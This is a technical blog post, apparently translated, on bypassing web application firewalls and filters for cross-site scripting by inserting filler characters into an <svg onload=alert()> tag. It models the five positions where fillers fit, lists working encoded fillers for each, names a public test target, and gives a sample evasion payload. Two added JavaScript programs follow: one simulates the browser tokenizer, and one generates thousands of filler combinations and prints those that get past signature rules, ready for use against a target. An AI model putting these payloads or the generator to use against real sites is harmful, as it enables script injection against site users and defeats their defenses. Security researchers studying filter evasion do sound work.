Exploring fillers (padding) in the HTML context: WAF && filter bypass series -- XSS

This article is part of a series on exploring and bypassing WAFs && filters.

1. Subject: XSS, HTML tags, fillers

First, a word about the concept of a filler.
A filler is a character (or sequence of characters) that can be placed between grammar symbols to separate them without changing the semantics. A simple XSS payload, <svg onload=alert()>, is an example: we can use / instead of the space between svg and onload, and HTML parsing is not affected. We say that / is a filler.

In WAF & filter bypass, fillers play a very important role: they "destroy" the shape the syntax is expected to have (the exact string a signature is written to match) without changing what the browser executes.

Today we will talk about XSS, the fillers available in the HTML context, and how to use them to bypass a WAF & filter.

2. Modeling

The explanation below uses the tag <svg onload=alert()> as the running example.

First, define each part of the tag:

  1. Start tag: <svg // head
  2. Event handler: onload // event
    2.5. Between the event handler and the equals sign
  3. Function executed when the event fires: alert() // func
    3.5. Between the equals sign and the function
  4. End of tag: > // tail

3. Exploring

Test target: http://brutelogic.com.br/xss.php?a=1

1. Filler between the start tag and the event handler (described URL-encoded)
BetTagAndEvent = {"%20", "/", "%09", "%0A", "%0D", "/xxx/", "%0C"} (and repeatable, e.g. %09%09)
i.e. space, slash, horizontal tab, line feed, carriage return, slash + any characters + slash, form feed.
The slash works because the HTML tokenizer treats it as the start of a self-closing tag; when it is not followed by >, the tokenizer recovers by moving on to the next attribute. That is also why /xxx/ works: xxx becomes a junk attribute and the second slash is another separator.
With the filler set known, the pattern is described as one or more fillers:

(filler)+

2. Between the event handler and the equals sign (described URL-encoded)
{"%20", "%09", "%0A", "%0D", "%0C"} (and repeatable, e.g. %09%09)
i.e. space, horizontal tab, line feed, carriage return, form feed. Only HTML whitespace works here; a slash would end the attribute name and start a new attribute, so it drops out of the set.
Described as

(filler)+


3. Between the equals sign and the function. Same as 2: the tokenizer skips whitespace before an attribute value.

4. Between the function name and the parentheses.
Form: <svg onload=alert%0B()>
{"%0B"} (and repeatable, e.g. %0B%0B)
This is the vertical tab. A note on the principle: when other characters are used, the value must be quoted, e.g. onload="alert%0a()". Inside the quotes, the whitespace between the function name and the parentheses is still part of the event handler value, and the JS engine accepts it. Outside quotes, the other characters are HTML whitespace and terminate the unquoted attribute value, so onload=alert%0a() leaves a handler of just alert, with () becoming a separate attribute. %0B is the exception: the HTML tokenizer does not treat the vertical tab as whitespace, so alert%0B() stays together as the handler value, while the JS engine does treat it as whitespace, so the browser runs alert%0B() as alert().
Described as

(%0B)+

5. The end of the tag
Tail = {"%20", "//", ">", "%0a", "%0d", "%09", "%0c"} (and repeatable, e.g. %0a%0a)
// works because it stays inside the unquoted value and becomes a JavaScript line comment; the whitespace fillers end the value, after which the tokenizer waits for the > that the rest of the page supplies.
Described as

(filler)+
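To see why each position admits exactly the fillers listed above, here is an added example (not code from the original post) that implements only the WHATWG start-tag tokenizer states a filler can land in, then hands the resulting onload value to the JS engine with alert replaced by a spy. The state names and the helper functions are my own; the transitions follow the HTML standard's tokenizer.

```javascript
// Added example (not code from the original post): a minimal HTML5 start-tag
// tokenizer covering only the WHATWG states a filler can land in, plus a check
// that the resulting onload value is something the JS engine will run.
// Run with `node`; it uses only built-ins.

const HTML_WS = new Set(['\t', '\n', '\f', ' ']); // whitespace inside a tag; CR is normalized to LF first

// Parse the first start tag in `html`. Returns { name, attrs: Map } or null
// when the input ends inside the tag (the rest of the page must supply the >).
function parseStartTag(html) {
  const s = html.replace(/\r\n?/g, '\n'); // input-stream preprocessing
  if (s[0] !== '<' || !/[A-Za-z]/.test(s[1] || '')) return null;
  const tag = { name: '', attrs: new Map() };
  let attr = null, quote = '';
  const flush = () => { if (attr && !tag.attrs.has(attr.name)) tag.attrs.set(attr.name, attr.value); attr = null; };
  const newAttr = () => { flush(); attr = { name: '', value: '' }; };
  const done = () => { flush(); return tag; };
  let state = 'tagName';
  for (let i = 1; i < s.length; i++) {
    const c = s[i];
    switch (state) {
      case 'tagName':      // "/" and HTML whitespace both end the tag name; %0B does not
        if (HTML_WS.has(c)) state = 'beforeName';
        else if (c === '/') state = 'selfClosing';
        else if (c === '>') return done();
        else tag.name += c.toLowerCase();
        break;
      case 'selfClosing':  // "/" not followed by ">" is a parse error, recovered as a separator
        if (c === '>') return done();
        state = 'beforeName'; i--;
        break;
      case 'beforeName':
        if (HTML_WS.has(c)) break;
        if (c === '/' || c === '>') { state = 'afterName'; i--; break; }
        newAttr(); state = 'name'; i--;
        break;
      case 'name':         // whitespace, "/" or ">" ends the name; "=" starts the value
        if (HTML_WS.has(c) || c === '/' || c === '>') { state = 'afterName'; i--; }
        else if (c === '=') state = 'beforeValue';
        else attr.name += c.toLowerCase();
        break;
      case 'afterName':
        if (HTML_WS.has(c)) break;
        if (c === '/') state = 'selfClosing';
        else if (c === '=') state = 'beforeValue';
        else if (c === '>') return done();
        else { newAttr(); state = 'name'; i--; }
        break;
      case 'beforeValue':  // whitespace after "=" is skipped
        if (HTML_WS.has(c)) break;
        if (c === '"' || c === "'") { quote = c; state = 'quoted'; }
        else if (c === '>') return done();
        else { state = 'unquoted'; i--; }
        break;
      case 'quoted':       // anything up to the matching quote stays in the value
        if (c === quote) state = 'afterQuoted'; else attr.value += c;
        break;
      case 'afterQuoted':
        if (HTML_WS.has(c)) state = 'beforeName';
        else if (c === '/') state = 'selfClosing';
        else if (c === '>') return done();
        else { state = 'beforeName'; i--; }
        break;
      case 'unquoted':     // only HTML whitespace or ">" ends an unquoted value, so "//" and %0B stay in it
        if (HTML_WS.has(c)) state = 'beforeName';
        else if (c === '>') return done();
        else attr.value += c;
        break;
    }
  }
  return null;
}

// Run an inline-handler string with `alert` replaced by a spy. Returns true if
// the JS engine parses the text and the call reaches alert; a SyntaxError or a
// runtime error before the call counts as "did not fire".
function handlerFires(js) {
  let fired = false;
  try { new Function('alert', js)(() => { fired = true; }); } catch (e) { /* not fired */ }
  return fired;
}

// Decode the post's %XX notation, append whatever the page puts after the
// injection point, and check the whole chain: does it tokenize to an <svg>
// with an onload attribute, and does that handler text call alert?
function payloadFires(encoded, pageTail = '') {
  const tag = parseStartTag(decodeURIComponent(encoded) + pageTail);
  if (!tag || tag.name !== 'svg' || !tag.attrs.has('onload')) return false;
  return handlerFires(tag.attrs.get('onload'));
}

// The post's payload has no closing ">", so the page has to supply it:
console.log(payloadFires('<svg%0a%0aonload%09=%0aalert%0b()%0a', '>'));  // true
console.log(payloadFires('<svg%0bonload=alert()>'));                     // false: VT is not HTML whitespace
```

The two calls at the bottom show the asymmetry the post relies on: the vertical tab is whitespace to the JS engine but not to the HTML tokenizer, so it survives inside an unquoted attribute value but cannot separate the tag name from the attribute.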

4. Summary

In most WAF & filter scenarios, not every filler is filtered out, or the rules are incomplete or malformed, so many combinations of fillers can bypass them.
Take the following payload: <svg%0a%0aonload%09=%0aalert%0b()%0a (it has no closing >, so it relies on the rest of the page to close the tag)
It may bypass a WAF that matches 1. onxxx= 2. =alert 3. alert().
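As an added example of the fuzzing idea (not code from the original post), the block below enumerates the five filler positions from the model, emits every combination in the post's URL-encoded notation, and checks each one against three literal signatures standing in for the rules the sample payload evades. The empty filler is included at every position so the baseline payload is part of the corpus; the regexes are an assumption for illustration, not rules from any real WAF.

```javascript
// Added example (not code from the original post): generate the filler
// combinations from the model and count how many slip past three naive
// literal rules. The rules are assumed for illustration, not from a product.

// Fillers per position, decoded. '' means "no filler" (the baseline payload).
// Position 4 (between the function name and its parentheses) only admits the
// vertical tab when the value is unquoted.
const FILLERS = {
  tagToEvent:  ['', ' ', '/', '\t', '\n', '\r', '/xxx/', '\f'],
  eventToEq:   ['', ' ', '\t', '\n', '\r', '\f'],
  eqToFunc:    ['', ' ', '\t', '\n', '\r', '\f'],
  funcToParen: ['', '\x0b'],
  tail:        ['', ' ', '//', '>', '\n', '\r', '\t', '\f'],
};

// Percent-encode only control characters and space, so the output reads like
// the post's notation, e.g. <svg%0a%0aonload%09=%0aalert%0b()%0a
function encode(raw) {
  return raw.replace(/[\x00-\x20]/g, c => '%' + c.charCodeAt(0).toString(16).padStart(2, '0'));
}

// Assemble head + filler + event + filler + "=" + filler + func + filler + "()" + tail.
function buildPayload(f) {
  return '<svg' + f.tagToEvent + 'onload' + f.eventToEq + '=' + f.eqToFunc +
         'alert' + f.funcToParen + '()' + f.tail;
}

// The three literal matches the post says its sample payload evades.
const NAIVE_RULES = [/on\w+=/i, /=alert/i, /alert\(/i];
function naiveWafBlocks(raw) { return NAIVE_RULES.some(r => r.test(raw)); }

// Cartesian product over the filler sets, yielding decoded payloads.
function* allPayloads() {
  for (const a of FILLERS.tagToEvent) for (const b of FILLERS.eventToEq)
    for (const c of FILLERS.eqToFunc) for (const d of FILLERS.funcToParen)
      for (const e of FILLERS.tail)
        yield buildPayload({ tagToEvent: a, eventToEq: b, eqToFunc: c, funcToParen: d, tail: e });
}

// How much of the corpus gets past the naive rules. Every payload with a
// non-empty filler at positions 2, 3 and 4 defeats all three literal matches.
function bypassStats() {
  let total = 0, bypassed = 0;
  for (const p of allPayloads()) { total++; if (!naiveWafBlocks(p)) bypassed++; }
  return { total, bypassed };
}

// Print the survivors in the post's notation, ready to feed to a test target.
function survivors() {
  return [...allPayloads()].filter(p => !naiveWafBlocks(p)).map(encode);
}

console.log(bypassStats());        // { total: 4608, bypassed: 1600 }
console.log(survivors().slice(0, 3));
```

Note that the survivors still have to be confirmed in a browser against the real reflection point: a filler that evades the rule is only useful if the tag still parses and the handler still runs, which depends on what the page appends after the injection.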

Because filters vary, this has to be combined with a detailed analysis of the specific scenario; white hats can build their own fuzzing approach from these ideas.

With a good idea, a WAF can always be worked around ~


Source: blog.csdn.net/bylfsj/article/details/105083266